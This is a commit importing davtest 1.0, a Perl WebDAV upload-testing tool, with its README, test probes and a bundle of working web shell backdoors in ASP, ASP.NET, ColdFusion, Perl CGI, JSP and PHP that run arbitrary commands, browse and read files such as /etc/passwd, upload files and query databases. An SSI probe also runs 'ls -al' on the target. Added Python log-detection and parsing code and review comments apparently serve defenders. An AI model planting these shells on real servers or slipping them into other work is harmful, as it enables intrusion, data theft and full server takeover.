Commit a146b4b5 authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 1.0

#############################################################
Copyright 2010 Sunera, LLC.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Author: Chris Sullo / csullo [at] sunera . com
#############################################################
About
This program attempts to exploit WebDAV enabled servers by:
- attempting to create a new directory (MKCOL)
- attempting to put test files of various programming languages (PUT)
- optionally attempting to put files with a .txt extension, then move them to an executable extension (MOVE)
- checking whether the files executed or were uploaded properly
- optionally uploading a backdoor/shell file for languages that execute
Additionally, this can be used to put an arbitrary file to remote systems.
#############################################################
Requirements
The following PERL modules are required from cpan.org:
HTTP::DAV
Getopt::Long
#############################################################
Options
davtest.pl -url url [options]
-auth+ Authorization like user:password. Supports Basic and Digest only, no NTLM (yet).
-cleanup Delete everything uploaded except backdoor/shell files
-directory+ Postfix of directory to create. This is always prefixed by 'DavTestDir_' and if not specified
is set to a random string.
-debug+ HTTP::DAV debug level 1-3. Levels 2 and 3 log request/responses to /tmp/perldav_debug.txt.
-move PUT files as .txt and then try to MOVE them to the executable file extension
-nocreate Don't create a directory, work at the -url level.
-quiet Only print out summary and serious (usually fatal) errors.
-random name+ Use this string instead of a random string for filenames.
-sendbd+ Send backdoor files (from backdoors/ directory). See each script's source for how to use it, if
it's not immediately obvious.
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ Upload this file to the server. This option requires -uploadloc to specify the remote location.
-uploadloc+ Upload -uploadfile to this location/name. This option requires -uploadfile.
-url+ Url of the DAV location.
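The About and Options sections above describe the request sequence davtest leaves in a web server's access log: an MKCOL for a collection named 'DavTestDir_' plus a suffix, PUTs of files carrying the extensions the test files probe, and, with -move, a PUT of a .txt file followed by a MOVE. As an added example (not part of davtest or this README), the following Python scans Apache combined-format log lines for that pattern from the server operator's side. The log lines, client addresses, the collection name and the DAV.pm user-agent string are constructed sample data, not taken from any real server, and the extension list is the one implied by the test files on this page.

```python
import re

# Apache "combined" access-log format; the request line is split into
# method, path and protocol.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Extensions probed by the tests/ files shown on this page (html and txt are
# left out: they are served back verbatim and never execute).
EXEC_EXTENSIONS = {"asp", "aspx", "cfm", "cgi", "jhtml", "jsp", "php", "pl", "shtml"}
# Directory prefix the README documents for the -directory option.
DAVTEST_DIR_PREFIX = "DavTestDir_"

# Constructed sample log (not from a real server): one davtest-style run from
# 10.0.0.5 and ordinary traffic from 192.168.1.20, including a benign PUT.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:10:01:02 +0000] "MKCOL /davdir/DavTestDir_k3j9x/ HTTP/1.1" 201 0 "-" "DAV.pm/v0.44"
10.0.0.5 - - [12/Mar/2010:10:01:03 +0000] "PUT /davdir/DavTestDir_k3j9x/davtest_k3j9x.php HTTP/1.1" 201 0 "-" "DAV.pm/v0.44"
10.0.0.5 - - [12/Mar/2010:10:01:03 +0000] "GET /davdir/DavTestDir_k3j9x/davtest_k3j9x.php HTTP/1.1" 200 5 "-" "DAV.pm/v0.44"
10.0.0.5 - - [12/Mar/2010:10:01:04 +0000] "PUT /davdir/DavTestDir_k3j9x/davtest_k3j9x.txt HTTP/1.1" 201 0 "-" "DAV.pm/v0.44"
10.0.0.5 - - [12/Mar/2010:10:01:04 +0000] "MOVE /davdir/DavTestDir_k3j9x/davtest_k3j9x.txt HTTP/1.1" 201 0 "-" "DAV.pm/v0.44"
192.168.1.20 - - [12/Mar/2010:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Mar/2010:10:05:01 +0000] "PUT /davdir/report.docx HTTP/1.1" 201 0 "-" "Microsoft-WebDAV-MiniRedir/6.1"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    req = m.groupdict()
    req["status"] = int(req["status"])
    return req


def extension(path):
    """Lower-cased extension of the last path segment, '' if there is none."""
    name = path.rstrip("/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def classify(req):
    """Reasons a request looks like a WebDAV upload probe; empty list if none."""
    reasons = []
    if DAVTEST_DIR_PREFIX in req["path"]:
        reasons.append("path under a %s* collection" % DAVTEST_DIR_PREFIX)
    if req["method"] == "PUT" and extension(req["path"]) in EXEC_EXTENSIONS:
        reasons.append("PUT of executable extension ." + extension(req["path"]))
    if req["method"] == "MOVE":
        reasons.append("MOVE (a .txt upload may be renamed to an executable extension)")
    if req["method"] == "MKCOL":
        reasons.append("MKCOL (new collection)")
    return reasons


def scan_access_log(text):
    """All parseable requests with at least one reason, in log order."""
    findings = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        reasons = classify(req)
        if reasons:
            findings.append(dict(client=req["client"], method=req["method"],
                                 path=req["path"], status=req["status"], reasons=reasons))
    return findings


def clients_with_create_then_write(findings):
    """Clients that created a collection and then successfully wrote inside it
    (the MKCOL -> PUT/MOVE sequence the README describes)."""
    created = {}
    hits = set()
    for f in findings:
        ok = 200 <= f["status"] < 300
        if f["method"] == "MKCOL" and ok:
            created.setdefault(f["client"], set()).add(f["path"].rstrip("/"))
        elif f["method"] in ("PUT", "MOVE") and ok:
            if any(f["path"].startswith(d + "/") for d in created.get(f["client"], ())):
                hits.add(f["client"])
    return hits


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print("%s %s %s -> %s" % (f["client"], f["method"], f["path"], "; ".join(f["reasons"])))
    print("create-then-write clients:", sorted(clients_with_create_then_write(found)))
```

The combined log format does not record the Destination header of a MOVE, so the script can only flag the MOVE itself; correlating it with the preceding PUT of a .txt file from the same client is what distinguishes the rename-to-executable step from an ordinary rename. The benign PUT of a .docx file from the second client is parsed but produces no finding.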
#############################################################
Test Files
Tests are used to determine if the server can execute a certain type of code. Each test may have a
corresponding backdoor file, but backdoor files *must* have a corresponding test to determine if
that file type can execute on the server. A simple, basic operation for each language is recommended; by default,
the supplied tests use a mathematical calculation where possible.
Test files are located in the 'test/' directory. Files must be named according to
the type of program file they will become on the server. For example, a file named 'php.txt'
will be put to the server with a .php extension.
Each file must have two lines, 'content' and 'execmatch'--the body put to the server and regex to
match to see if it executed. For example, the php.txt contents are:
content=<?php print 7.8 * 6.4;?>
execmatch=49.92
Additionally, the token $$FILENAME$$ will be replaced (with the PUT file's name) in the content before
it is sent to the server. Embedded newlines (\n) will be converted to actual newlines (to accommodate PERL).
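As an added example (not davtest's own code, which is Perl; this is a Python re-implementation of the rules in this section), here is a small parser for the test-file format: it reads the 'content' and 'execmatch' lines, applies the $$FILENAME$$ substitution and the \n conversion, and decides from a server response whether the code executed. The test texts are the php.txt and perl entries shown on this page plus the flastmod part of the SSI test; the responses are constructed samples. Treating lines that start with '#' as comments is an assumption, made because one test file on this page contains such a line.

```python
import re

FILENAME_TOKEN = "$$FILENAME$$"

# Test files as shown on this page (the SSI one reduced to its flastmod part).
PHP_TEST = "content=<?php print 7.8 * 6.4;?>\nexecmatch=49.92\n"
PERL_TEST = ("content=#!/usr/bin/perl\\nprint 'Content-Type: text/html\\n\\r\\n\\r' . 7.8 * 6.4;\n"
             "execmatch=49.92\n")
SHTML_TEST = ('content=<!--#config timefmt="%Y" -->YEAR:<!--#flastmod file="$$FILENAME$$"-->:YEAR<br />\n'
              'execmatch=YEAR\\:[0-9]{4}\\:YEAR\n')


def parse_test_file(text):
    """Split each 'key=value' line on the first '=' and require both keys.
    Lines starting with '#' are skipped as comments (assumption, see lead-in)."""
    fields = {}
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if "=" not in raw:
            raise ValueError("not a key=value line: %r" % raw)
        key, value = raw.split("=", 1)
        fields[key.strip()] = value
    missing = {"content", "execmatch"} - fields.keys()
    if missing:
        raise ValueError("missing field(s): " + ", ".join(sorted(missing)))
    re.compile(fields["execmatch"])  # fail early on an invalid regex
    return fields


def render_content(content, filename):
    """Substitute $$FILENAME$$ with the PUT file's name, then turn the two-character
    sequence backslash-n into a real newline, as the README describes."""
    return content.replace(FILENAME_TOKEN, filename).replace("\\n", "\n")


def executed(execmatch, response_body):
    """True if the server's response contains a match for the execmatch regex."""
    return re.search(execmatch, response_body) is not None


def pattern_is_loose(execmatch):
    """True if execmatch uses an unescaped '.', which matches any character
    rather than a literal dot (so '49.92' would also accept '49x92')."""
    return "." in execmatch and "\\." not in execmatch


def evaluate(test_text, filename, response_body):
    """Parse a test file, render what would be PUT, and judge the response."""
    t = parse_test_file(test_text)
    return {
        "sent": render_content(t["content"], filename),
        "executed": executed(t["execmatch"], response_body),
        "loose_pattern": pattern_is_loose(t["execmatch"]),
    }


if __name__ == "__main__":
    # Constructed responses: a server that ran the PHP, and one that served the
    # source back unchanged.
    print(evaluate(PHP_TEST, "davtest_abc.php", "49.92"))
    print(evaluate(PHP_TEST, "davtest_abc.php", "<?php print 7.8 * 6.4;?>"))
    print(evaluate(SHTML_TEST, "davtest_abc.shtml", "YEAR:2010:YEAR<br />"))
    print(repr(render_content(parse_test_file(PERL_TEST)["content"], "davtest_abc.pl")))
```

Because execmatch is a regular expression rather than a literal, an unescaped dot in '49.92' matches any character; the `pattern_is_loose` check reports that so a test author can decide whether to write '49\.92' instead. The Perl test shows why the \n conversion exists: inside the single-quoted Perl string nothing would otherwise turn the escape into a line break, so davtest does it before the PUT.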
#############################################################
Backdoor files
Backdoor files are located in the 'backdoors/' directory. They must have the matching extension for the type
they will be uploaded for. For example, a php backdoor must have a '.php' extension.
A backdoor file can contain any code you desire, and multiple backdoor files may be used for a file type.
If multiple files exist for a type, each will be uploaded when appropriate.
A backdoor type (e.g., php) *must* have a corresponding type in the 'tests/' directory, otherwise it will
never be tested/uploaded.
#############################################################
Examples
Example: Test file uploads at this location url:
davtest.pl -url http://localhost/davdir
Example: Test file uploads at this location url and send backdoors for any that succeed:
davtest.pl -url http://localhost/davdir -sendbd auto
Example: Upload a file using authentication, send the perl_cmd.pl backdoor and call it perl.pl on the server:
davtest.pl -url http://localhost/davdir -auth user:pass -uploadfile backdoors/perl_cmd.pl -uploadloc perl.pl
#############################################################
TODO:
- NTLM authentication
- Backdoors for more languages
- Validate jhtml test syntax
These backdoors/shells are mostly from Michael Daw's excellent "Web Backdoor Compilation" which can be
found at http://michaeldaw.org/projects/web-backdoor-compilation.
To enable a new backdoor file for upload, simply drop it here and make sure the extension matches
whichever type of language it is. For example, a JSP backdoor should be named... something.jsp.
If multiple files are present for a language, they will all be uploaded when appropriate.
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<!-- http://michaeldaw.org 2006 -->
\ No newline at end of file
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
\ No newline at end of file
<html>
<body>
<!-- Contributed by Kurt Grutzmacher () -->
Notes:<br><br>
<ul>
<li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c &lt;command&gt;" or wherever cmd.exe is<br>
<li>Options are, of course, the command line options you want to run
<li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
</ul>
<p>
<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</FORM>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfif>
</cfoutput>
</body>
</html>
<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->
<!-- http://michaeldaw.org 04/2007 -->
\ No newline at end of file
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->
\ No newline at end of file
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
print "<pre>";
fpassthru($file);
print "</pre>";
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
$files = array();
echo "<h2>listing of $d</h2><hr>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) $type="dir";
else $type="file";
$files[$dir]=$type;
}
ksort($files);
foreach ($files as $f=>$t) {
if ($t == "dir") {
echo "<a href='$PHP_SELF?d=$d/$f'><font color=grey>$f/</font></a><br />";
}
else {
echo "<a href='$PHP_SELF?f=$d/$f'><font color=black>$f</font></a><br />";
}
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], "$dir$fname"))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
$curdir = getcwd();
print "Current directory is: $curdir<br />";
if (preg_match("/^[a-zA-Z]:\//", $curdir, $match)) {
print "Browse: <a href=\"?d=$match[0]\">/</a><br />";
}
else {
print "Browse: <a href=\"?d=/\">/</a><br />";
}
print "Browse: <a href=\"?d=$curdir\">$curdir</a><br /><hr>";
?>
<br />
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<br />
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>
<br />
To browse:<br />
<hr>
<br />
Execute mysql query:
<br />
<br />
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost">
<br />
user: <input type="text" name="usr" value=root>
<br />
password: <input type="text" name="passwd">
<br />
database: <input type="text" name="db">
<br />
query: <input type="text" name="mquery">
<br />
<input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
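Review bot: nothing in this file set ever removes the shells it uploads. The README states that -cleanup deletes everything uploaded except backdoor/shell files, so every one of these files (the ASP shell keyed on the `.CMD` form field, the ASP.NET, CFM, CGI, JSP and PHP shells keyed on `cmd` or `c`, each ending in an `http://michaeldaw.org` comment) stays on the tested server until someone deletes it by hand. The README should say so explicitly and name where they land (the `DavTestDir_` collection, or the `-uploadloc` path) so the tester and the server owner can confirm removal after the test; those fixed parameter names and trailer comments are also what file-integrity and web-shell scanners key on, which is worth noting next to the 'Backdoor files' section.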
To enable a new test file for upload, simply drop it here and name it ext.txt, where ext is the extension of
the language it tests. For example, a JSP test should be named... jsp.txt.
content=<html><body><% response.write (7.8 * 6.4) %>
execmatch=49.92
content=<html><body><% response.write (7.8 * 6.4) %>
execmatch=49.92
content=<cfscript>WriteOutput(7.8*6.4);</cfscript>
execmatch=49.92
content=#!/usr/bin/perl\nprint 'Content-Type: text/html\n\r\n\r' . 7.8 * 6.4;
execmatch=49.92
content=HTML put via davtest<br />
execmatch=HTML put via davtest
# This is a complete guess as to syntax
content=<%= System.out.println(7.8 * 6.4); %>
execmatch=49.92
content=<%= System.out.println(7.8 * 6.4); %>
execmatch=49.92
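Review bot: the two `content=<%= System.out.println(7.8 * 6.4); %>` probes cannot produce a match as written. `println` returns void, so it is not a legal `<%= %>` expression and the page will fail to translate; even as a `<% %>` scriptlet its output would go to the container's stdout, not the HTTP response, so `execmatch=49.92` is never found and a JSP-capable server is reported as not executing. A `<%= %>` expression must evaluate to a value, and the rendered text should be checked against the execmatch pattern before the test is relied on; the `# This is a complete guess as to syntax` line and the 'Validate jhtml test syntax' TODO already flag this, so the JSP one should be marked the same way until verified.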
content=<?php print 7.8 * 6.4;?>
execmatch=49.92
content=#!/usr/bin/perl\nprint 'Content-Type: text/html\n\r\n\r' . 7.8 * 6.4;
execmatch=49.92
content=<!--#config timefmt="%Y" -->YEAR:<!--#flastmod file="$$FILENAME$$"-->:YEAR<br />EXEC ls:<!--#exec cmd="ls -al"-->:EXEC ls<br />EXEC dir:<!--#exec cmd="dir"-->:EXEC dir
execmatch=YEAR\:[0-9]{4}\:YEAR
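Review bot: the verdict for this SSI probe depends only on the `flastmod` token (`execmatch=YEAR\:[0-9]{4}\:YEAR`), so the two `<!--#exec cmd=...-->` directives (`ls -al` and `dir`) never affect the result and only run commands on the server under test as a side effect. Either drop them from `content=`, or document that this test does more than write a file; note also that a server configured with `Options IncludesNOEXEC` still passes the flastmod check, so this test proves SSI parsing, not command execution.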
content=TXT put via davtest
execmatch=TXT put via davtest